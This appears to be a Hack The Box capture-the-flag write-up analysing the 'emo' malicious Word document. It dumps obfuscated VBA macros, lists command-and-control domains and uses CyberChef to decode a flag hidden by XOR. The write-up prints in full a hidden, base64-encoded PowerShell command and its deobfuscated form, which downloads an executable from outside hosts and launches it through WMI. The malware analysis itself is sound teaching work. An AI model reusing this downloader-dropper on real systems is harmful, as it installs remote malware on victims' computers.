Set ySEvH = (dPjSD)
Dim UCKMD(7 + 7 + 1 + 7) As String
IAfgHf(pbkxGAl) = (Sin(64) + 9310 + 36)
jnRKDfHGR = xQCmGFBcQ
IAfgHf(pbkxGAl + pbkxGAl) = (xHITFH + 9)
IAfgHf(pbkxGAl + pbkxGAl) = 9 + Oct(1) + DNCnGH + CDbl(8) + (2 + BAyRTA + vCVpAH + Cos(80))
Dim QcSsG(5 + 7 + 1 + 8) As String
Set bREjDuI = (xpDtBC)
Dim TCPatL(5 + 5 + 1 + 7) As String
QcSsG(MWhDgeFoD) = (Sin(11) + 4 + 970)
yxteyAHjD = pQBvJdCI
QcSsG(MWhDgeFoD + MWhDgeFoD) = (PrLzBhA + 140)
QcSsG(MWhDgeFoD + MWhDgeFoD) = 9 + Oct(3670) + ScqHd + CDbl(4) + (5662 + WovTAEU + WECuD + Cos(131))
End Function
-------------------------------------------------------------------------------
VBA MACRO Rk3572j7tam4v8.bas 
in file: emo.doc - OLE stream: 'Macros/VBA/Rk3572j7tam4v8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Function Y5ruq1pwxek1348fi(Hy5393z_cu1)
On Error Resume Next
   Dim TAKBR(6 + 7 + 1 + 5) As String
Set ivvpvBW = (yWAMfE)
Dim rkcHF(5 + 6 + 1 + 6) As String
TAKBR(ksEsBaCtA) = (Sin(1897) + 5881 + 6)
ZOmZFY = UovwGH
TAKBR(ksEsBaCtA + ksEsBaCtA) = (jHUdBB + 44)
TAKBR(ksEsBaCtA + ksEsBaCtA) = 6 + Oct(116) + YSVfIA + CDbl(6) + (6 + MakkGA + qhhoEEA + Cos(5))
Dim ojnIHCE(7 + 5 + 1 + 7) As String
Set UuAPGAfFH = (jdxSsGH)
Dim BctfKqn(6 + 8 + 1 + 5) As String
ojnIHCE(JoDasPDE) = (Sin(8) + 6 + 40)
IwHWCHJLB = sqHqe
ojnIHCE(JoDasPDE + JoDasPDE) = (JdtFGmA + 5)
ojnIHCE(JoDasPDE + JoDasPDE) = 2 + Oct(7819) + Rwbej + CDbl(9) + (4 + YBDhHCIR + FMTZFCBH + Cos(2894))
Set Y5ruq1pwxek1348fi = CreateObject(Hy5393z_cu1)
   Dim XayLAAE(6 + 7 + 1 + 7) As String
Set hBkDI = (kuHYCInr)
Dim GUdOBwJFg(6 + 8 + 1 + 4) As String
XayLAAE(DFPEBfGJ) = (Sin(8) + 632 + 555)
MOOXq = yIMQNHJJ
XayLAAE(DFPEBfGJ + DFPEBfGJ) = (QRuDtDeBh + 8952)
XayLAAE(DFPEBfGJ + DFPEBfGJ) = 6 + Oct(4) + ydSHHJF + CDbl(464) + (6107 + jBTBKJJ + gFSXE + Cos(4815))
Dim cREZHj(6 + 7 + 1 + 5) As String
Set fCASJI = (sNHBGJB)
Dim ohlbI(5 + 5 + 1 + 7) As String
cREZHj(EPsmDJFHe) = (Sin(740) + 13 + 3027)
QZkhqLi = bYDhRDF
cREZHj(EPsmDJFHe + EPsmDJFHe) = (NgGemeSEB + 3)
cREZHj(EPsmDJFHe + EPsmDJFHe) = 2011 + Oct(8) + TddiLDt + CDbl(423) + (3 + DajuFERHE + WvQuFBA + Cos(23))
End Function
-------------------------------------------------------------------------------
VBA FORM STRING IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
][(s)]wP][(s)]w
-------------------------------------------------------------------------------
VBA FORM STRING IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
][(s)]wtar][(s)]w
-------------------------------------------------------------------------------
VBA FORM STRING IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
][(s)]wtu][(s)]w
-------------------------------------------------------------------------------
VBA FORM Variable "b'Fwder3b7t4tqrecw'" IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
b'][(s)]wP][(s)]w'
-------------------------------------------------------------------------------
VBA FORM Variable "b'Mvskm12if9c843w3'" IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
b'][(s)]wtar][(s)]w'
-------------------------------------------------------------------------------
VBA FORM Variable "b'Cn8r2cg8i626ztt'" IN 'emo.doc' - OLE stream: 'Macros/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
b'][(s)]wtu][(s)]w'
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|Suspicious|Create              |May execute file or a system command through |
|          |                    |WMI                                          |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|ChrW                |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+


Deobfuscation

we need to deobfuscate this mess, and we know that the malware executes some code as soon as the user opens the file. Leaning on my background in programming, that means at some point in this mess of text there is going to be an entry point of which our payload is being called from. So we need to find hints of functions being called.

If we go back to those txt files we made from oledump outputs, we can examine the files

1
2
3
4
5
6
Private Sub Document_open()
Get4ipjzmjfvp.X8twf_cydt6
End Sub
Function X4al3i4glox(Gav481k8nh28)
X4al3i4glox = Replace(Gav481k8nh28, "][(s)]w", Sxybmdt069cn)
End Function

I assumed that Document_open() was a function that is called when the document is opened…

So this Get4ipjzmjfvp.X8twf_cydt6 is potentially our entry point to the payload.

The Trojan

/images/htb/challenges/forensics/emo/enable1.png

Dynamic Analysis – app.any.run

Screenshot 2023-12-10 212517

Through Dynamic analysis we can see the DNS Connections with this we can say that this might be the command and control connections

1
2
3
4
5
6
7
da-industrial.htb
daprofesional.htb
www.outspokenvisions.htb
dagranitegiare.htb
mobsouk.htb
biglaughs.htb
ngllogistics.htb

The Payload

1
2
POwersheLL -windowstyle hidden -ENCOD               IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAGUAJwAsACcAcgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC4ASQBPAC4AZABJACcALAAnAE0AJwApACAAIAApACAAOwAgACAAIABzAGUAdAAgACAAVAB4AHkAUwBlAG8AIAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADAAfQB7ADcAfQB7ADUAfQB7ADYAfQB7ADQAfQB7ADIAfQB7ADEAfQB7ADgAfQB7ADMAfQAiAC0ARgAnAFMAWQBzAFQARQAnACwAJwBUAE0AJwAsACcASQBOACcALAAnAEUAUgAnACwAJwBwAE8AJwAsACcATgBlAFQALgBzAGUAJwAsACcAUgBWAEkAQwBFACcALAAnAE0ALgAnACwAJwBBAE4AYQBHACcAKQApACAAOwAgACAAJABOAGIAZgA1AHQAZwAzAD0AKAAnAEIAOQAnACsAJwB5AHAAJwArACgAJwA5ADAAJwArACcAcwAnACkAKQA7ACQAVgB4AG4AbAByAGUAMAA9ACQAQwBsAHUAZABrAGoAeAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA2AHIAMQB0AHUAeQA7ACQASwB5ADMAcQAwAGUAOAA9ACgAKAAnAFIAcQAnACsAJwBkAHgAJwApACsAJwB3AG8AJwArACcANQAnACkAOwAgACAAKAAgACAARABpAHIAIAAgAHYAYQBSAGkAQQBiAGwAZQA6ADAAWgB4ACkALgB2AGEAbAB1AEUAOgA6ACIAQwByAGUAQQBUAGAARQBgAGQASQBSAEUAYwBgAFQAYABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAbgBEAHAAJwArACcASgByAGIAJwApACsAKAAnAGUAJwArACcAdgBrADQAbgAnACkAKwAnAEQAJwArACcAcAAnACsAKAAnAEMAJwArACcAYwB3AHIAXwAyAGgAJwApACsAJwBuAEQAJwArACcAcAAnACkAIAAtAFIAZQBQAGwAQQBjAEUAIAAoACcAbgAnACsAJwBEAHAAJwApACwAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQARgBOADUAZwBnAG0AcwBIACAAPQAgACgAMQA4ADIALAAxADgANwAsADIAMgA5ACwAMQA0ADYALAAyADMAMQAsADEANwA3ACwAMQA1ADEALAAxADQAOQAsADEANgA2ACkAOwAkAFAAeQBvAHoAZwBlAG8APQAoACgAJwBKADUAZgAnACsAJwB5ADEAJwApACsAJwBjACcAKwAnAGMAJwApADsAIAAoACAAIAB2AGEAUgBpAEEAQgBMAEUAIABUAHgAWQBTAEUAbwAgACAAKQAuAFYAYQBsAHUARQA6ADoAIgBTAGUAYwBVAHIASQBgAFQAWQBwAGAAUgBgAE8AdABPAGMAYABvAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAEYATgA1AGcAZwBtAHMASAAgACsAPQAgACgAMQA4ADYALAAxADQAMQAsADIAMgA4ACwAMQA4ADIALAAxADcANwAsADEANwAxACwAMgAyADkALAAyADMANgAsADIAMwA5ACwAMgAzADkALAAyADMAOQAsADIAMgA4ACwAMQA4ADEALAAxADgAMgAsADEANwAxACwAMgAyADkALAAyADMANAAsADIAMwA5ACwAMgAzADkALAAyADIAOAApADsAJABIAHUAYQBqAGcAYgAwAD0AKAAoACcASgBuACcAKwAnAG8AJwApACsAJwA1AGcAJwArACcAYQAxACcAKQA7ACQAQgBiADIAOAB1AG0AbwAgAD0AIAAoACgAJwBBAGwAZQAnACsAJwA3AGcAJwApACsAJwBfADgAJwApADsAJABIAHMAYwBlAF8AagBzAD0AKAAnAEsAdgAnACsAKAAnAG4AYgAnACsAJwBvAHYAXwAnACkAKQA7ACQAUwBwAGsANQAxAHUAZQA9ACgAKAAnAEMAJwArACcANwB4AG8AJwApACsAJwA5AGcAJwArACcAbAAnACkAOwAkAFMAYwB1AHMAYgBrAGoAPQAkAEgATwBNAEUAKwAoACgAJwA1ACcAKwAnAHQAJwArACgAJwBmACcAKwAnAEoAcgBiAGUAdgAnACsAJwBrACcAKQArACgAJwA0ADUAdABmACcAKwAnAEMAYwAnACsAJwB3ACcAKQArACcAcgAnACsAKAAnAF8AMgBoACcAKwAnADUAdABmACcAKQApACAALQByAEUAcABsAEEAQwBFACAAIAAoAFsAQwBoAEEAUgBdADUAMwArAFsAQwBoAEEAUgBdADEAMQA2ACsAWwBDAGgAQQBSAF0AMQAwADIAKQAsAFsAQwBoAEEAUgBdADkAMgApACsAJABCAGIAMgA4AHUAbQBvACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQARgBOADUAZwBnAG0AcwBIACAAKwA9ACAAKAAxADgANQAsADEANwA5ACwAMQA5ADAALAAxADgANAAsADIAMgA5ACwAMQA1ADEALAAxADMAOQAsADEANQA3ACwAMQA2ADQALAAyADMANQAsADEANwA3ACwAMgAzADkALAAxADcAMQAsADEAOAAzACwAMgAzADYALAAxADQAMQAsADEAMgA4ACwAMQA4ADcALAAyADMANQAsADEAMwA0ACwAMQAyADgALAAxADUAOAAsADEANwA3ACwAMQA3ADYALAAxADMAOQApADsAJABoAGIAbQBzAGsAVgAyAFQAPQAoACgAJwBDACcAKwAnADcAeABvACcAKQArACcAOQBnACcAKwAnAGwAJwApADsAJABoAGIAbQBzAGsAVgAyAFQAPQAkAEgATwBNAEUAKwAoACgAJwA1ACcAKwAnAHQAJwArACgAJwBmACcAKwAnAEoAcgBiAGUAdgAnACsAJwBrACcAKQArACgAJwA0ADUAdABmACcAKwAnAEMAYwAnACsAJwB3ACcAKQArACcAcgAnACsAKAAnAF8AMgBoACcAKwAnADUAdABmACcAKQApACAALQByAEUAcABsAEEAQwBFACAAIAAoAFsAQwBoAEEAUgBdADUAMwArAFsAQwBoAEEAUgBdADEAMQA2ACsAWwBDAGgAQQBSAF0AMQAwADIAKQAsAFsAQwBoAEEAUgBdADkAMgApACsAJABCAGIAMgA4AHUAbQBvACsAKAAoACcALgBjACcAKwAnAG8AJwApACsAJwBuAGYAJwApADsAJABRADEAXwB5ADAANQBfAD0AKAAnAFcAJwArACgAJwA0ACcAKwAnAHEAdgB5ACcAKQArACcAegA4ACcAKQA7ACQATwBkAGIAMwBoAGYAMwA9ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAEUAQgBjAGwASQBFAE4AdAA7ACQARgBOADUAZwBnAG0AcwBIACAAKwA9ACAAKAAxADgAMwAsADEANQA0ACwAMQA3ADMALAAxADIAOAAsADEANwA1ACwAMQA1ADEALAAyADMAOAAsADEANAAwACwAMQA4ADMALAAxADYAMgAsADIAMgA4ACwAMQA3ADAALAAxADcAMwAsADEANwA5ACwAMgAyADkAKQA7ACQAQQBuAGIAeQB0ADEAeQA9ACgAJwBoACcAKwAoACcAdAB0AHAAOgAnACsAJwBdAFsAJwArACcAKABzACkAXQAnACkAKwAoACgAJwB3AF0AJwArACcAWwAoACcAKQApACsAKAAoACcAcwApACcAKwAnAF0AdwAnACkAKQArACgAJwBkAGEAJwArACcALQAnACkAKwAnAGkAJwArACcAbgAnACsAJwBkAHUAJwArACgAJwBzACcAKwAnAHQAcgBpAGEAbAAuACcAKwAnAGgAJwArACcAdAAnACkAKwAnAGIAXQAnACsAKAAnAFsAKABzACkAXQAnACsAJwB3ACcAKwAnAGoAcwAnACkAKwAoACgAJwBdACcAKwAnAFsAKAAnACkAKQArACgAKAAnAHMAJwArACcAKQBdAHcAOQBJAGQATAAnACsAJwBQAF0AWwAnACsAJwAoAHMAJwArACcAKQBdAHcAJwArACcAQABoACcAKQApACsAKAAnAHQAJwArACcAdABwADoAXQAnACkAKwAoACcAWwAoAHMAJwArACcAKQBdACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAWwAoAHMAKQBdACcAKQArACgAJwB3AGQAYQBwACcAKwAnAHIAbwAnACsAJwBmAGUAcwBpAG8AbgBhACcAKwAnAGwALgBoACcAKQArACcAdABiACcAKwAoACcAXQBbACgAcwAnACsAJwApACcAKwAnAF0AJwApACsAJwB3ACcAKwAoACcAZAAnACsAJwBhAHQAYQAnACkAKwAoACcANABdAFsAKABzACcAKwAnACkAXQB3AGgAJwApACsAKAAnAFcAZwBXACcAKwAnAGoAVAAnACkAKwAoACcAVgBdACcAKwAnAFsAJwApACsAKAAnACgAcwApAF0AdwBAAGgAdAB0AHAAJwArACcAcwA6AF0AWwAoAHMAJwArACcAKQBdACcAKwAnAHcAJwArACcAXQAnACkAKwAnAFsAJwArACgAJwAoAHMAKQAnACsAJwBdAHcAZABhAGcAJwArACcAcgBhACcAKQArACcAbgBpACcAKwAnAHQAJwArACgAJwBlAGcAJwArACcAaQBhACcAKQArACgAJwByAGUALgBoACcAKwAnAHQAJwApACsAJwBiAF0AJwArACgAJwBbACcAKwAnACgAcwApACcAKQArACgAJwBdAHcAdwAnACsAJwBwAC0AYQAnACsAJwBkAG0AJwArACcAaQBuAF0AWwAoAHMAKQAnACsAJwBdAHcAdAAnACkAKwAoACcAVgBdAFsAJwArACcAKABzACcAKwAnACkAJwApACsAKAAnAF0AdwBAACcAKwAnAGgAJwApACsAJwB0AHQAJwArACcAcAAnACsAKAAnADoAJwArACcAXQBbACcAKQArACgAJwAoAHMAKQBdAHcAXQBbACcAKwAnACgAcwAnACsAJwApAF0AdwB3AHcAJwArACcAdwAnACsAJwAuAG8AdQB0ACcAKwAnAHMAJwArACcAcAAnACkAKwAoACcAbwBrACcAKwAnAGUAJwApACsAJwBuAHYAJwArACcAaQAnACsAKAAnAHMAJwArACcAaQBvAG4AcwAuACcAKQArACgAJwBoAHQAYgAnACsAJwBdACcAKQArACcAWwAnACsAKAAnACgAcwApAF0AdwAnACsAJwB3AHAAJwArACcALQBpAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAJwApACsAKAAnAGUAcwBdAFsAKABzACkAJwArACcAXQB3AGEAVwAnACsAJwBvACcAKwAnAE0AJwApACsAKAAnAF0AJwArACcAWwAoACcAKwAnAHMAKQBdAHcAJwApACsAKAAnAEAAJwArACcAaAB0AHQAcAA6AF0AJwApACsAKAAnAFsAKABzACkAJwArACcAXQB3AF0AWwAoACcAKwAnAHMAKQAnACkAKwAoACcAXQB3AG0AbwAnACsAJwBiAHMAJwApACsAKAAnAG8AJwArACcAdQBrAC4AaAAnACkAKwAoACgAJwB0ACcAKwAnAGIAXQBbACgAJwApACkAKwAoACgAJwBzACkAJwArACcAXQB3AHcAcAAtACcAKQApACsAJwBpAG4AJwArACcAYwAnACsAJwBsACcAKwAoACcAdQBkAGUAJwArACcAcwBdACcAKwAnAFsAJwApACsAKAAnACgAcwApAF0AJwArACcAdwAnACkAKwAoACcAVQBZACcAKwAnADMAMABSAF0AJwApACsAKAAnAFsAKABzACcAKwAnACkAXQB3ACcAKwAnAEAAJwArACcAaAAnACsAJwB0AHQAcAA6AF0AWwAnACkAKwAoACcAKAAnACsAJwBzACkAXQB3ACcAKQArACgAJwBdAFsAJwArACcAKABzACkAJwApACsAKAAnAF0AJwArACcAdwBiACcAKQArACcAaQAnACsAKAAnAGcAJwArACcAbABhAHUAZwBoACcAKwAnAHMAJwApACsAKAAoACcALgBoACcAKwAnAHQAJwArACcAYgBdAFsAKABzACcAKQApACsAKAAoACcAKQBdACcAKQApACsAKAAnAHcAcwAnACsAJwBtAGEAbABsAHAAbwB0ACcAKwAnAGEAdABvACcAKQArACcAZQBzACcAKwAoACgAJwBdACcAKwAnAFsAKABzACcAKQApACsAKAAoACcAKQBdAHcAWQBdACcAKwAnAFsAKABzACcAKwAnACkAXQB3ACcAKwAnAEAAaAAnACsAJwB0AHQAcABzADoAXQBbACgAcwApACcAKQApACsAJwBdAHcAJwArACgAJwBdAFsAKAAnACsAJwBzACkAXQB3AG4AJwArACcAZwAnACkAKwAoACcAbABsACcAKwAnAG8AJwApACsAKAAnAGcAaQBzAHQAJwArACcAaQAnACkAKwAoACcAYwBzAC4AJwArACcAaAAnACkAKwAnAHQAJwArACgAJwBiAF0AJwArACcAWwAnACsAJwAoACcAKwAnAHMAKQBdAHcAJwApACsAJwBhAGQAJwArACgAJwBtAGkAJwArACcAbgAnACkAKwAnAGUAcgAnACsAJwBdACcAKwAoACcAWwAoAHMAJwArACcAKQBdAHcAJwArACcAVwAzAG0AJwApACsAJwBrACcAKwAoACgAJwBCACcAKwAnAF0AWwAoAHMAJwApACkAKwAoACgAJwApACcAKwAnAF0AdwAnACkAKQApAC4AIgByAGUAcABgAEwAQQBjAEUAIgAoACgAJwBdACcAKwAnAFsAJwArACgAJwAoAHMAKQBdACcAKwAnAHcAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABgAGwASQBUACIAKAAkAEkAdgBnADMAegBjAHUAIAArACAAJABWAHgAbgBsAHIAZQAwACAAKwAgACQASgB6AGEAZQB3AGQAeQApADsAJABHAGMAbwB5AHYAbAB2AD0AKAAoACcASwBmACcAKwAnAF8AJwApACsAKAAnADkAJwArACcAZQB0ADEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEEAOABpADMAawBlADEAIABpAG4AIAAkAEEAbgBiAHkAdAAxAHkAKQB7AHQAcgB5AHsAJABPAGQAYgAzAGgAZgAzAC4AIgBkAE8AYABXAG4ATABPAEEAYABkAGYASQBMAGUAIgAoACQAQQA4AGkAMwBrAGUAMQAsACAAJABTAGMAdQBzAGIAawBqACkAOwAkAFoAaABjAG4AYQB1AHgAPQAoACgAJwBFAGsAJwArACcAawAnACkAKwAoACcAagAnACsAJwA0ADcAdAAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABTAGMAdQBzAGIAawBqACkALgAiAEwARQBuAGAARwBUAGgAIgAgAC0AZwBlACAANAA1ADEAOQA5ACkAIAB7ACQAewBBADgAYABJAGAAMwBLAEUAMQB9AC4AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAJwBhAHkAJwAsACcAVABvAEMAaABhACcALAAnAHIAQQByAHIAJwApAC4ASQBuAHYAbwBrAGUAKAApACAAfAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9AHsAMwB9ACIAIAAtAGYAJwAtACcALAAnAGEAYwBoACcALAAnAEYAbwByAEUAJwAsACcATwBiAGoAZQBjAHQAJwApACAALQBwAHIAbwBjAGUAcwBzACAAewAgACQAewBGAE4ANQBgAEcARwBtAGAAUwBoAH0AIAArAD0AIAAoAFsAYgB5AHQAZQBdAFsAYwBoAGEAcgBdACQAewBfAH0AIAAtAGIAeABvAHIAIAAwAHgAZABmACAAKQAgAH0AOwAgACQARgBOADUAZwBnAG0AcwBIACAAKwA9ACAAKAAyADIAOAApADsAIAAkAGIAMABSAGoAZQAgAD0AIAAgAFsAdAB5AHAAZQBdACgAIgB7ADEAfQB7ADAAfQAiACAALQBGACcAVgBlAHIAVAAnACwAJwBDAG8AbgAnACkAOwAgACAAIAAkAEIAMABSAGoARQA6ADoAIgB0AE8AYABCAGEAUwBgAEUANgA0AFMAYABUAFIASQBgAE4AZwAiACgAJAB7AGYAbgA1AGAAZwBnAG0AYABzAGgAfQApACAAfAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAGkAbABlACcALAAnAHUAdAAtAGYAJwAsACcAbwAnACkAIAAkAHsAaABCAGAAbQBTAEsAYABWADIAVAB9ADsAIAAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAoACcAdwBpACcAKwAnAG4AJwApACsAKAAnADMAMgBfACcAKwAnAFAAcgBvAGMAJwArACcAZQAnACkAKwAnAHMAJwArACcAcwAnACkAKQAuACIAYwBSAGAAZQBhAFQARQAiACgAJABTAGMAdQBzAGIAawBqACkAOwAkAEcAbAB3AGsAaQA2AGEAPQAoACcASQAnACsAJwBtACcAKwAoACcAdABkACcAKwAnAHgAdgA2ACcAKQApADsAYgByAGUAYQBrADsAJABQAGYAcABiAGwAaAAxAD0AKAAnAFYAcwAnACsAKAAnAGwAYQBsACcAKwAnAGMAJwApACsAJwB1ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARgA0ADcAaQBlAGYAMgA9ACgAKAAnAEIAbgAnACsAJwB6AGkAZAAnACkAKwAnAHIAdAAnACkA

After formatting this messy payload

a3761e2d95392443ff3ec40d77ce34cd-3495940740

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<SV  0zX ([TyPe]("{2}{0}{4}{3}{1}"-f 'e','rECtorY','sYst','.IO.dI','M')) ;   
set TxySeo ([TYpe]("{0}{7}{5}{6}{4}{2}{1}{8}{3}"-F'SYsTE','TM','IN','ER','pO','NeT.se','RVICE','M.','ANaG')) ;  

$Nbf5tg3 = ('B9'+'yp'+('90'+'s'));
$Vxnlre0 = $Cludkjx + [char](64) + $R6r1tuy;
$Ky3q0e8 = (('Rq'+'dx')+'wo'+'5');

(Dir vaRiAble:0Zx).valuE::"CreAT`E`dIREc`T`OrY"($HOME + ((('nDp'+'Jrb')+('e'+'vk4n')+'D'+'p'+('C'+'cwr_2h')+'nD'+'p') -RePlAcE ('n'+'Dp'),[cHaR]92));
$FN5ggmsH = (182,187,229,146,231,177,151,149,166);

$Pyozgeo = (('J5f'+'y1')+'c'+'c');
(vaRiABLE TxYSEo).ValuE::"SecUrI`TYp`R`OtOc`ol" = (('Tl'+'s1')+'2');
$FN5ggmsH += (186,141,228,182,177,171,229,236,239,239,239,228,181,182,171,229,234,239,239,228);

$Huajgb0 = (('Jn'+'o')+'5g'+'a1');
$Bb28umo = (('Ale'+'7g')+'_8');
$Hsce_js = ('Kv'+('nb'+'ov_'));
$Spk51ue = (('C'+'7xo')+'9g'+'l');
$Scusbkj = $HOME + (('5'+'t'+('f'+'Jrbev'+'k')+('45tf'+'Cc'+'w')+'r'+('_2h'+'5tf')) -rEplACE  ([ChAR]53+[ChAR]116+[ChAR]102),[ChAR]92) + $Bb28umo + (('.e'+'x')+'e');
$FN5ggmsH += (185,179,190,184,229,151,139,157,164,235,177,239,171,183,236,141,128,187,235,134,128,158,177,176,139);

$hbmskV2T = (('C'+'7xo')+'9g'+'l');
$hbmskV2T = $HOME + (('5'+'t'+('f'+'Jrbev'+'k')+('45tf'+'Cc'+'w')+'r'+('_2h'+'5tf')) -rEplACE  ([ChAR]53+[ChAR]116+[ChAR]102),[ChAR]92) + $Bb28umo + (('.c'+'o')+'nf');
$Q1_y05_ = ('W'+('4'+'qvy')+'z8');
$Odb3hf3 = &('n'+'e'+'w-object') Net.WEBclIENt;
$FN5ggmsH += (183,154,173,128,175,151,238,140,183,162,228,170,173,179,229);
$Anbyt1y = ('h'+('ttp:'+']['+'(s)]')+(('w]'+'[('))+(('s)'+']w'))+('da'+'-')+'i'+'n'+'du'+('s'+'trial.'+'h'+'t')+'b]'+('[(s)]'+'wjs')+((']'+'[('))+(('s'+')]w9IdL'+'P]['+'(s'+')]w'+'@h'))+('t'+'tp:]')+('[(s'+')]')+'w'+(']'+'[(s)]')+('wdap'+'ro'+'fesiona'+'l.h')+'tb'+('][(s'+')'+']')+'w'+('d'+'ata')+('4][(s'+')]wh')+('WgW'+'jT')+('V]'+'[')+('(s)]w@http'+'s:][(s'+')]'+'w'+']')+'['+('(s)'+']wdag'+'ra')+'ni'+'t'+('eg'+'ia')+('re.h'+'t')+'b]'+('['+'(s)')+(']ww'+'p-a'+'dm'+'in][(s)'+']wt')+('V]['+'(s'+')')+']w@'+'h')+'tt'+'p'+(':'+'][')+('(s)]w]['+'(s'+')]www'+'w'+'.out'+'s'+'p')+('ok'+'e')+'nv'+'i'+('s'+'ions.')+('htb'+']')+'['+('(s)]w'+'wp'+'-in')+('clu'+'d')+('es][(s)'+']waW'+'o'+'M')+(']'+'[('+'s)]w')+('@'+'http:]')+('[(s)'+']w][('+'s)')+(']wmo'+'bs')+('o'+'uk.h')+(('t'+'b][('))+(('s)'+']wwp-'))+'in'+'c'+'l'+('ude'+'s]'+'[')+('(s)]'+'w')+('UY'+'30R]')+('[(s'+')]w'+'@'+'h'+'ttp:][')+('('+'s)]w')+(']['+'(s)')+(']'+'wb')+'i'+('g'+'laugh'+'s')+(('.h'+'t'+'b][(s'))+((')]'))+('ws'+'mallpot'+'ato')+'es'+((']'+'[(s'))+((')]wY]'+'[(s'+')]w'+'@h'+'ttps:][(s)'))+']w'+('][('+'s)]wn'+'g')+('ll'+'o')+('gist'+'i')+('cs.'+'h')+'t'+('b]'+'['+'('+'s)]w')+'ad'+('mi'+'n')+'er'+']'+('[(s'+')]w'+'W3m')+'k'+(('B'+'][(s'))+((')'+']w')))."rep`LAcE"((']'+'['+('(s)]'+'w')),([array]('/'),('xw'+'e'))[0])."sP`lIT"($Ivg3zcu + $Vxnlre0 + $Jzaewdy);
$Gcoyvlv = (('Kf'+'_')+('9'+'et1'));
foreach ($A8i3ke1 in $Anbyt1y){
    try{
        $Odb3hf3."dO`WnLOA`dfILe"($A8i3ke1, $Scusbkj);
        $Zhcnaux = (('Ek'+'k')+('j'+'47t'));
        if ((&('Get-I'+'te'+'m') $Scusbkj)."LEn`GTh" -ge 45199) {
            ${A8`I`3KE1}.("{1}{2}{0}" -f'ay','ToCha','rArr').Invoke() | .("{2}{1}{0}{3}" -f'-','ach','ForE','Object') -process {
                ${FN5`GGm`Sh} += ([byte][char]${_} -bxor 0xdf )
            };
            $FN5ggmsH += (228);
            $b0Rje = [type]("{1}{0}" -F'VerT','Con');
            $B0RjE::"tO`BaS`E64S`TRI`Ng"(${fn5`ggm`sh}) | .("{2}{1}{0}" -f 'ile','ut-f','o') ${hB`mSK`V2T};
            ([wmiclass](('wi'+'n')+('32_'+'Proc'+'e')+'s'+'s'))."cR`eaTE"($Scusbkj);
            $Glwki6a = ('I'+'m'+('td'+'xv6'));
            break;
            $Pfpblh1 = ('Vs'+('lal'+'c')+'u')
        }
    }
    catch{}
}
$F47ief2 = (('Bn'+'zid')+'rt')

There’s something that immediately sticks out to me, and that’s all the numbers in this format:

$FN5ggmsH += (186,141,228,182,177,171,229,236,239,239,239,228,181,182,171,229,234,239,239,228)

$FN5ggmsH += (185,179,190,184,229,151,139,157,164,235,177,239,171,183,236,141,128,187,235,134,128,158,177,176,139)

$FN5ggmsH += (183,154,173,128,175,151,238,140,183,162,228,170,173,179,229)

Lets Decode

CyberChef

I wanted to revert these potential Unicode encoded characters back to their original text state. This can be accomplished by using the From Charcode recipe - of which we’ll set the Base to 10 and the delimiter to a comma.

We can see in the payload that it’s been xor with the key 0xdf so lets put this receipe in cybechef

final-xor


Screenshot 2023-12-10 200044

Flag

HTB{4n0th3R_d4Y*********}

This post is licensed under CC BY 4.0 by the author.

front-page port 80-shoopyuPractical Windows Forensics

front-page port 80-shoopyu Dignostics | Hack The Box | Forensics